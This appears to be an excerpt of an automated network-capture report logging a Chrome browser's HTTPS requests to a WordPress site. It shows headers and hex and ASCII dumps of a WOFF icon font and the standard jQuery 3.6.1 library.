                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 8a 32 9a 4b 2d 5f c8 a5 ce 20 dd 03 35 c2 82 d8 c4 e5 bd 1d 41 70 bf bc de 0c 7e 55 6a f9 08 2c 7b f5 b1 3f dc 06 b4 b7 3f 01 ca 5a 2f 8d fd f1 b2 67 e4 6f f7 7e e0 da 92 e4 03 e0 03 9f 93 d6 5b 0a 22 6d cb 27 4e 3a 9b 97 ff 98 4c 06 e4 86 61 3a b6 c2 eb 13 0b 87 68 f4 fa 78 ec 3e a9 2c 6a e2 a5 51 87 12 9b 85 ed 0a 92 38 ca 3b d1 a0 3b fa 5f b3 2b 42 f3 f5 cc 55 81 f2 b0 d1 eb d9 db b4 de 7d 8e bb ae 4b df 50 6b 6a 36 75 f4 dc f1 a7 f7 4f 0e 7b 9f 7b 7f cb 69 e4 7f 49 3d 0d ef 3f 18 fb f5 73 06 7e 99 b3 c7 d9 5e f7 58 fc f7 f1 c7 40 08 b8 c1 c5 c3 2c 68 2a 9e 03 2a 23 d6 7f ad 90 51 d4 b0 ac 83 51 1b 88 e6 a7 33 61 58 48 70 29 42 72 1f 6b cb 24 2c 31 4a 3d c9 24 9f 93 8f ff ac 5f 10 df a5 39 9d d6 e8 f8 24 b3 15 05 74 10 ec 30 b9 1c f2 0e 75 73 1c 30 e4
                                                                                                                      Data Ascii: 2K-_ 5Ap~Uj,{??Z/go~["m'N:La:hx>,jQ8;;_+BU}KPkj6uO{{iI=?s~^X@,h**#QQ3aXHp)Brk$,1J=$_9$t0us0
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: ec d9 67 94 e8 74 31 e3 1a f4 fc 1a 63 4c ab b9 d1 30 a9 6f 12 0f fd 31 43 d9 8d 65 86 98 5e 77 91 3e 1d fd ad e3 f4 c2 bd 21 36 d3 6a 02 1a 66 34 f2 eb 4b a1 e0 85 18 09 47 7a 01 69 16 b5 0c fd 04 64 b2 df b4 8e d1 c9 4c 5d 80 8f 10 bf 7f 2f 79 7f 20 ef 04 72 d9 45 be 7f 82 1a 46 f0 93 7e d3 9b 55 13 db 51 40 b4 df 89 85 a9 60 be e2 31 71 b4 e0 b7 08 10 55 77 62 be 88 a9 5c 4c 28 f0 62 59 92 19 fa f5 8f df 25 b5 29 a2 0a 5a fa c4 13 52 1a 07 6c d2 bf a9 f1 cb aa d5 7f bb 30 1d 2d 57 69 e0 55 d0 a4 aa 49 9f 7f 53 8b e0 2b 04 f1 95 be fb 0e 5f 21 88 af 04 f2 79 fc 87 8e 5d 98 9e 92 e0 2b d2 e4 d2 72 1c e8 fb 3d 0e 60 9e 27 74 76 37 7b 1c b7 17 d1 d0 c5 e4 91 04 8a 8e 7d e4 98 eb 31 d9 08 ed 94 08 f6 7b 5c c7 83 80 a8 24 0d dc ee 63 8f cf 9c 5a f7 87 3b 0a
                                                                                                                      Data Ascii: gt1cL0o1Ce^w>!6jf4KGzidL]/y rEF~UQ@`1qUwb\L(bY%)ZRl0-WiUIS+_!y]+r=`'tv7{}1{\$cZ;
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: fe 88 10 df 5e 11 e3 d1 1c 89 9c bf 44 2a a7 e1 d4 bf 01 56 22 f7 84 17 0c ad 68 b2 18 94 32 2d 30 ca 65 f2 bd bb b4 32 16 2e d9 cc 74 4b 55 72 d0 5d 9a ae a2 ba f4 97 55 80 96 d1 82 83 40 ad 40 5d 90 95 f1 80 f7 99 f0 ed cc e0 a3 f3 96 62 b2 c7 d2 bf 16 6b a8 08 35 04 af c4 13 a8 05 d4 a5 d4 d5 d4 2d e2 3a 8c 17 54 42 fd b2 be b8 b0 0a 0b eb 6e 7a d9 e5 d2 88 dc 84 96 0d 0a cb 6e 22 0e 12 be 98 86 8e a6 cd 28 45 85 2e 56 58 80 f1 e4 ab 8b 12 5c 49 5e 58 c1 05 2b d7 50 1a 4d 32 71 8e 81 17 32 24 e9 fa 02 f9 1b 0c 45 7f 81 c9 29 a9 32 f2 1e b3 de e9 28 03 4f 5c 22 89 44 4f 7d 51 df e8 cf 0a 96 d7 eb 1b 3a 5a 0b 8a ea 1a 42 ee 22 67 87 5b 3f a4 6b 44 51 14 33 5b 5d 1b f4 05 ba ea bc e0 d0 ac c2 2c 65 0e b8 52 a3 ca 2a 94 cb 37 ed b2 95 6a 0b 77 ed 82 97 e4
                                                                                                                      Data Ascii: ^D*V"h2-0e2.tKUr]U@@]bk5-:TBnzn"(E.VX\I^X+PM2q2$E)2(O\"DO}Q:ZB"g[?kDQ3[],eR*7jw
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 55 86 29 0b d9 fc 3c 32 4e 28 c4 3b 68 2d f8 8e 50 9f 71 c2 8d eb 5d b5 61 56 25 c1 17 3f 79 18 fe 79 97 4e b5 eb eb 4d 07 81 f6 09 b5 f0 d9 8e 8d 13 9e 79 5b a7 7b 5b c8 68 dc 31 72 a3 23 dc 7d 1e 42 2b 3a 3e cc ae 8e d7 85 a0 a0 0b a5 4e 20 97 22 0a eb f1 09 dc 96 d1 e4 f5 c5 37 41 ed 71 30 aa f8 b7 e1 e7 ea 74 f0 23 49 8a 24 4f 2a 7d 11 7e 14 a3 f1 ff a4 8c c0 f5 a2 54 9a 87 12 77 84 ba aa 44 cf 45 15 86 1f 09 37 5e 14 a8 20 9a 87 9e 00 d9 9d ed 23 44 be 28 bc 25 f2 fd 4d f3 2a f9 36 58 3e 24 f0 90 9d 40 70 14 5e 11 20 96 b7 93 0d c0 ec 22 29 09 7a 41 ec e3 47 f9 84 d6 25 0c 62 f4 3e a2 13 3e 15 cf 54 b1 5e 12 7d b7 c7 3b 11 81 0d b3 18 4f 18 83 b7 c7 98 51 aa b3 3b 63 2d 2f 0a 5e ef e4 23 37 77 f5 56 74 02 09 73 26 ed eb 8a 47 27 2a 01 87 2d 23 c1 d7
                                                                                                                      Data Ascii: U)<2N(;h-Pq]aV%?yyNMy[{[h1r#}B+:>N "7Aq0t#I$O*}~TwDE7^ #D(%M*6X>$@p^ ")zAG%b>>T^};OQ;c-/^#7wVts&G'*-#
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 8f c4 19 bb db 6c c0 3c 6b 4f 36 bb d2 8b 50 b6 13 24 4b 36 6d 9d c8 c0 a3 fc f2 0d db 26 d0 77 36 33 96 64 56 d1 6b e0 27 eb d5 88 21 10 01 f5 80 81 6f 3d 0e 92 74 0a 34 48 e8 05 87 d3 fa 4a 65 5c b5 72 2e 6d 4f 61 15 c9 7a fd a0 b6 0d 2a 5a 81 d2 a9 fa 57 bc f7 a4 5b 2e 73 ce df 9f 56 22 95 b1 a5 ca 11 6b 3e 84 97 e0 4b f0 d2 87 6b d6 7c 08 32 41 3f 90 f9 e1 67 b7 98 60 e8 f5 66 17 2e 8e 7d 18 dd 57 3c 77 d5 ba b1 a2 e8 2b fc bc 95 eb c7 f6 7e fb 38 ad 55 29 a4 e9 2d 87 6c 7d 50 96 d5 aa 99 b4 d3 ca 2a 52 33 99 da cf 37 a8 18 39 7e ed 80 3e e7 1e 07 46 b5 5c a4 93 cb 5b 0e 58 51 3a ae 4a 31 b7 44 a2 08 d5 7e ba 4e 4e e3 2a 28 06 7c 43 5e be 26 b1 40 f4 da 7f c6 47 81 d8 dc 6a a4 d2 31 3a 0e c0 3b 6b 4e 17 fa 5c fe 0c 09 30 b2 01 c6 85 66 12 b5 d3 a8 a5
                                                                                                                      Data Ascii: l<kO6P$K6m&w63dVk'!o=t4HJe\r.mOaz*ZW[.sV"k>Kk|2A?g`f.}W<w+~8U)-l}P*R379~>F\[XQ:J1D~NN*(|C^&@Gj1:;kN\0f


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      115192.168.2.449877196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC662OUTGET /wp-content/themes/salient/css/fonts/icomoon.woff?v=1.3 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      Origin: https://www.itnaledi.co.za
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: font
                                                                                                                      Referer: https://www.itnaledi.co.za/wp-content/themes/salient/css/build/style.css?ver=15.0.6
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC261INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:26:32 GMT
                                                                                                                      ETag: "528c-5eed4eee4c200"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 21132
                                                                                                                      Content-Type: font/woff
                                                                                                                      2024-12-03 07:55:25 UTC7931INData Raw: 77 4f 46 46 00 01 00 00 00 00 52 8c 00 0b 00 00 00 00 52 40 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4f 53 2f 32 00 00 01 08 00 00 00 60 00 00 00 60 0f 12 0e bd 63 6d 61 70 00 00 01 68 00 00 01 44 00 00 01 44 5f df 7a 51 67 61 73 70 00 00 02 ac 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 02 b4 00 00 4b 94 00 00 4b 94 49 b0 1d 35 68 65 61 64 00 00 4e 48 00 00 00 36 00 00 00 36 21 12 9f cd 68 68 65 61 00 00 4e 80 00 00 00 24 00 00 00 24 08 09 04 64 68 6d 74 78 00 00 4e a4 00 00 01 68 00 00 01 68 52 16 13 42 6c 6f 63 61 00 00 50 0c 00 00 00 b6 00 00 00 b6 ed ee d6 4e 6d 61 78 70 00 00 50 c4 00 00 00 20 00 00 00 20 00 85 06 58 6e 61 6d 65 00 00 50 e4 00 00 01 86 00 00 01 86 99 4a 09 fb 70 6f 73 74 00 00 52 6c 00 00 00
                                                                                                                      Data Ascii: wOFFRR@OS/2``cmaphDD_zQgaspglyfKKI5headNH66!hheaN$$dhmtxNhhRBlocaPNmaxpP XnamePJpostRl
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 80 11 0d 0c 0c 0d 11 80 12 0c 0d 0c 0d 12 11 0d 0c 25 26 35 03 95 0c 0d 11 80 12 0d 0c 0d 0c 12 11 0d 0c 25 26 35 80 11 0d 0c fd 80 25 26 35 80 11 0d 0c 0c 0d 11 80 12 0c 0d 0c 0d 12 11 0d 0c 02 80 0c 0d 11 80 35 26 25 0c 0d 11 12 0c 0d 0c 0d 12 80 11 0d 0c fd 80 0c 0d 11 12 0d 0c 0d 0c 12 80 11 0d 0c 0c 0d 11 80 35 26 25 00 00 01 00 ab 00 6b 03 55 03 15 00 28 00 00 01 32 17 16 15 14 07 09 01 16 15 14 07 06 23 22 27 09 01 06 23 22 27 26 35 34 37 09 01 26 35 34 37 36 33 32 17 09 01 36 33 03 2b 12 0c 0c 0c fe f3 01 0d 0c 0c 0c 12 12 0d fe f4 fe f4 0d 12 12 0c 0c 0c 01 0d fe f3 0c 0c 0c 12 12 0d 01 0c 01 0c 0d 12 03 15 0c 0c 12 12 0d fe f4 fe f4 0d 12 12 0c 0c 0c 01 0d fe f3 0c 0c 0c 12 12 0d 01 0c 01 0c 0d 12 12 0c 0c 0c fe f3 01 0d 0c 00 00 03 00 55 00 95
                                                                                                                      Data Ascii: %&5%&5%&55&%5&%kU(2#"'#"'&547&54763263+U
                                                                                                                      2024-12-03 07:55:25 UTC5201INData Raw: 01 d7 07 08 1e 14 0b 12 07 01 ed 48 3e 3f 5d 1b 1b 1b 1b 5d 3f 3e 48 47 3e 3f 5d 1b 1c 1c 1b 5d 3f 3e 47 00 00 00 01 00 19 00 0c 03 e7 03 ab 00 09 00 00 25 05 13 27 25 1b 01 05 07 13 02 00 fe d3 43 fd 01 57 90 90 01 57 fd 43 b5 a9 01 53 ea 28 01 3a fe c6 28 ea fe ad 00 04 00 00 ff c0 04 00 03 c0 00 1d 00 3b 00 4c 00 5c 00 00 01 32 17 1e 01 17 16 15 14 07 0e 01 07 06 23 22 27 2e 01 27 26 35 31 34 37 3e 01 37 36 33 35 22 07 0e 01 07 06 15 14 17 1e 01 17 16 33 32 37 3e 01 37 36 35 31 34 27 2e 01 27 26 23 11 22 26 35 31 11 34 36 33 32 16 15 31 11 14 06 23 37 21 22 26 35 34 36 33 31 21 32 16 15 14 06 23 02 00 56 4c 4c 71 21 20 20 21 71 4c 4c 56 56 4c 4c 71 20 21 21 20 71 4c 4c 56 6a 5d 5d 8c 28 28 28 28 8c 5d 5d 6a 6a 5e 5d 8b 28 28 28 28 8b 5d 5e 6a 14 1c 1c
                                                                                                                      Data Ascii: H>?]]?>HG>?]]?>G%'%CWWCS(:(;L\2#"'.'&5147>7635"327>76514'.'&#"&5146321#7!"&54631!2#VLLq! !qLLVVLLq !! qLLVj]]((((]]jj^]((((]^j


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      116192.168.2.449876196.22.142.1434434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-03 07:55:24 UTC387OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.6.1 HTTP/1.1
                                                                                                                      Host: www.itnaledi.co.za
                                                                                                                      Connection: keep-alive
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: none
                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2024-12-03 07:55:25 UTC298INHTTP/1.1 200 OK
                                                                                                                      Date: Tue, 03 Dec 2024 07:55:25 GMT
                                                                                                                      Server: Apache
                                                                                                                      Upgrade: h2,h2c
                                                                                                                      Connection: Upgrade, close
                                                                                                                      Last-Modified: Fri, 02 Dec 2022 09:25:24 GMT
                                                                                                                      ETag: "15e54-5eed4ead72900"
                                                                                                                      Accept-Ranges: bytes
                                                                                                                      Content-Length: 89684
                                                                                                                      Vary: Accept-Encoding
                                                                                                                      Content-Type: application/javascript
                                                                                                                      2024-12-03 07:55:25 UTC7894INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                      Data Ascii: /*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 72 65 74 75 72 6e 28 22 69 6e 70 75 74 22 3d 3d 3d 74 7c 7c 22 62 75 74 74 6f 6e 22 3d 3d 3d 74 29 26 26 65 2e 74 79 70 65 3d 3d 3d 6e 7d 7d 66 75 6e 63 74 69 6f 6e 20 67 65 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 6f 72 6d 22 69 6e 20 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 21 31 3d 3d 3d 65 2e 64 69 73 61 62 6c 65 64 3f 22 6c 61 62 65 6c 22 69 6e 20 65 3f 22 6c 61 62 65 6c 22 69 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3f 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 3a 65 2e 69 73 44 69 73 61 62 6c 65 64 3d 3d 3d 74 7c 7c 65 2e 69 73 44 69 73 61 62 6c 65
                                                                                                                      Data Ascii: odeName.toLowerCase();return("input"===t||"button"===t)&&e.type===n}}function ge(t){return function(e){return"form"in e?e.parentNode&&!1===e.disabled?"label"in e?"label"in e.parentNode?e.parentNode.disabled===t:e.disabled===t:e.isDisabled===t||e.isDisable
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 76 61 72 20 72 2c 69 2c 6f 2c 61 2c 73 2c 75 2c 6c 3d 76 21 3d 3d 6d 3f 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 3a 22 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 22 2c 63 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 66 3d 78 26 26 65 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 70 3d 21 6e 26 26 21 78 2c 64 3d 21 31 3b 69 66 28 63 29 7b 69 66 28 76 29 7b 77 68 69 6c 65 28 6c 29 7b 61 3d 65 3b 77 68 69 6c 65 28 61 3d 61 5b 6c 5d 29 69 66 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 21 31 3b 75 3d 6c 3d 22 6f 6e 6c 79 22 3d 3d 3d 68 26 26 21 75 26 26 22 6e 65 78 74 53 69 62 6c 69 6e 67 22 7d 72 65 74 75 72 6e 21 30 7d 69
                                                                                                                      Data Ascii: var r,i,o,a,s,u,l=v!==m?"nextSibling":"previousSibling",c=e.parentNode,f=x&&e.nodeName.toLowerCase(),p=!n&&!x,d=!1;if(c){if(v){while(l){a=e;while(a=a[l])if(x?a.nodeName.toLowerCase()===f:1===a.nodeType)return!1;u=l="only"===h&&!u&&"nextSibling"}return!0}i
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 29 26 26 72 2e 73 70 65 63 69 66 69 65 64 3f 72 2e 76 61 6c 75 65 3a 6e 75 6c 6c 7d 29 2c 73 65 7d 28 43 29 3b 53 2e 66 69 6e 64 3d 64 2c 53 2e 65 78 70 72 3d 64 2e 73 65 6c 65 63 74 6f 72 73 2c 53 2e 65 78 70 72 5b 22 3a 22 5d 3d 53 2e 65 78 70 72 2e 70 73 65 75 64 6f 73 2c 53 2e 75 6e 69 71 75 65 53 6f 72 74 3d 53 2e 75 6e 69 71 75 65 3d 64 2e 75 6e 69 71 75 65 53 6f 72 74 2c 53 2e 74 65 78 74 3d 64 2e 67 65 74 54 65 78 74 2c 53 2e 69 73 58 4d 4c 44 6f 63 3d 64 2e 69 73 58 4d 4c 2c 53 2e 63 6f 6e 74 61 69 6e 73 3d 64 2e 63 6f 6e 74 61 69 6e 73 2c 53 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 3d 64 2e 65 73 63 61 70 65 3b 76 61 72 20 68 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 5b 5d 2c 69 3d 76 6f 69 64 20 30 21 3d 3d 6e 3b
                                                                                                                      Data Ascii: )&&r.specified?r.value:null}),se}(C);S.find=d,S.expr=d.selectors,S.expr[":"]=S.expr.pseudos,S.uniqueSort=S.unique=d.uniqueSort,S.text=d.getText,S.isXMLDoc=d.isXML,S.contains=d.contains,S.escapeSelector=d.escape;var h=function(e,t,n){var r=[],i=void 0!==n;
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 24 29 2c 53 2e 72 65 61 64 79 28 29 7d 53 2e 66 6e 2e 72 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 46 2e 74 68 65 6e 28 65 29 5b 22 63 61 74 63 68 22 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 53 2e 72 65 61 64 79 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 29 2c 74 68 69 73 7d 2c 53 2e 65 78 74 65 6e 64 28 7b 69 73 52 65 61 64 79 3a 21 31 2c 72 65 61 64 79 57 61 69 74 3a 31 2c 72 65 61 64 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 28 21 30 3d 3d 3d 65 3f 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 3a 53 2e 69 73 52 65 61 64 79 29 7c 7c 28 53 2e 69 73 52 65 61 64 79 3d 21 30 29 21 3d 3d 65 26 26 30 3c 2d 2d 53 2e 72 65 61 64 79 57 61 69 74 7c 7c 46 2e 72 65 73 6f 6c 76 65 57 69 74 68 28 45 2c 5b 53
                                                                                                                      Data Ascii: tener("load",$),S.ready()}S.fn.ready=function(e){return F.then(e)["catch"](function(e){S.readyException(e)}),this},S.extend({isReady:!1,readyWait:1,ready:function(e){(!0===e?--S.readyWait:S.isReady)||(S.isReady=!0)!==e&&0<--S.readyWait||F.resolveWith(E,[S
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 20 30 29 2c 74 29 45 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29 2c 21 31 3d 3d 3d 69 29 69 3d 54 65 3b 65 6c 73 65 20 69 66 28 21 69 29 72 65 74 75 72 6e 20 65 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 6f 26 26 28 61 3d 69 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 28 29 2e 6f 66 66 28 65 29 2c 61 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 67 75 69 64 3d 61 2e 67 75 69
                                                                                                                      Data Ascii: 0),t)Ee(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0)),!1===i)i=Te;else if(!i)return e;return 1===o&&(a=i,(i=function(e){return S().off(e),a.apply(this,arguments)}).guid=a.gui
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 6e 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 6e 2e 65 71 28 65 29 3b 68 26 26 28 72 5b 30 5d 3d 64 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 74 2e 68 74 6d 6c 28 29 29 29 2c 48 65 28 74 2c 72 2c 69 2c 6f 29 7d 29 3b 69 66 28 66 26 26 28 74 3d 28 65 3d 78 65 28 72 2c 6e 5b 30 5d 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 21 31 2c 6e 2c 6f 29 29 2e 66 69 72 73 74 43 68 69 6c 64 2c 31 3d 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 26 26 28 65 3d 74 29 2c 74 7c 7c 6f 29 29 7b 66 6f 72 28 73 3d 28 61 3d 53 2e 6d 61 70 28 79 65 28 65 2c 22 73 63 72 69 70 74 22 29 2c 44 65 29 29 2e 6c 65 6e 67 74 68 3b 63 3c 66 3b 63 2b 2b 29 75 3d 65 2c 63 21 3d 3d 70 26 26 28 75 3d 53 2e 63 6c 6f 6e 65 28 75 2c 21 30 2c 21 30 29
                                                                                                                      Data Ascii: n.each(function(e){var t=n.eq(e);h&&(r[0]=d.call(this,e,t.html())),He(t,r,i,o)});if(f&&(t=(e=xe(r,n[0].ownerDocument,!1,n,o)).firstChild,1===e.childNodes.length&&(e=t),t||o)){for(s=(a=S.map(ye(e,"script"),De)).length;c<f;c++)u=e,c!==p&&(u=S.clone(u,!0,!0)
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 69 3d 74 65 2e 65 78 65 63 28 6e 29 29 26 26 69 5b 31 5d 26 26 28 6e 3d 73 65 28 65 2c 74 2c 69 29 2c 6f 3d 22 6e 75 6d 62 65 72 22 29 2c 6e 75 6c 6c 21 3d 6e 26 26 6e 3d 3d 6e 26 26 28 22 6e 75 6d 62 65 72 22 21 3d 3d 6f 7c 7c 75 7c 7c 28 6e 2b 3d 69 26 26 69 5b 33 5d 7c 7c 28 53 2e 63 73 73 4e 75 6d 62 65 72 5b 73 5d 3f 22 22 3a 22 70 78 22 29 29 2c 76 2e 63 6c 65 61 72 43 6c 6f 6e 65 53 74 79 6c 65 7c 7c 22 22 21 3d 3d 6e 7c 7c 30 21 3d 3d 74 2e 69 6e 64 65 78 4f 66 28 22 62 61 63 6b 67 72 6f 75 6e 64 22 29 7c 7c 28 6c 5b 74 5d 3d 22 69 6e 68 65 72 69 74 22 29 2c 61 26 26 22 73 65 74 22 69 6e 20 61 26 26 76 6f 69 64 20 30 3d 3d 3d 28 6e 3d 61 2e 73 65 74 28 65 2c 6e 2c 72 29 29 7c 7c 28 75 3f 6c 2e 73 65 74 50 72 6f 70 65 72 74 79 28 74 2c 6e 29 3a 6c
                                                                                                                      Data Ascii: i=te.exec(n))&&i[1]&&(n=se(e,t,i),o="number"),null!=n&&n==n&&("number"!==o||u||(n+=i&&i[3]||(S.cssNumber[s]?"":"px")),v.clearCloneStyle||""!==n||0!==t.indexOf("background")||(l[t]="inherit"),a&&"set"in a&&void 0===(n=a.set(e,n,r))||(u?l.setProperty(t,n):l
                                                                                                                      2024-12-03 07:55:25 UTC8000INData Raw: 61 6e 69 6d 2e 73 74 6f 70 28 6f 29 2c 65 3d 21 31 2c 6e 2e 73 70 6c 69 63 65 28 74 2c 31 29 29 3b 21 65 26 26 6f 7c 7c 53 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 69 29 7d 29 7d 2c 66 69 6e 69 73 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 31 21 3d 3d 61 26 26 28 61 3d 61 7c 7c 22 66 78 22 29 2c 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 2c 74 3d 59 2e 67 65 74 28 74 68 69 73 29 2c 6e 3d 74 5b 61 2b 22 71 75 65 75 65 22 5d 2c 72 3d 74 5b 61 2b 22 71 75 65 75 65 48 6f 6f 6b 73 22 5d 2c 69 3d 53 2e 74 69 6d 65 72 73 2c 6f 3d 6e 3f 6e 2e 6c 65 6e 67 74 68 3a 30 3b 66 6f 72 28 74 2e 66 69 6e 69 73 68 3d 21 30 2c 53 2e 71 75 65 75 65 28 74 68 69 73 2c 61 2c 5b 5d 29 2c 72 26 26 72 2e 73 74 6f 70 26 26 72
                                                                                                                      Data Ascii: anim.stop(o),e=!1,n.splice(t,1));!e&&o||S.dequeue(this,i)})},finish:function(a){return!1!==a&&(a=a||"fx"),this.each(function(){var e,t=Y.get(this),n=t[a+"queue"],r=t[a+"queueHooks"],i=S.timers,o=n?n.length:0;for(t.finish=!0,S.queue(this,a,[]),r&&r.stop&&r
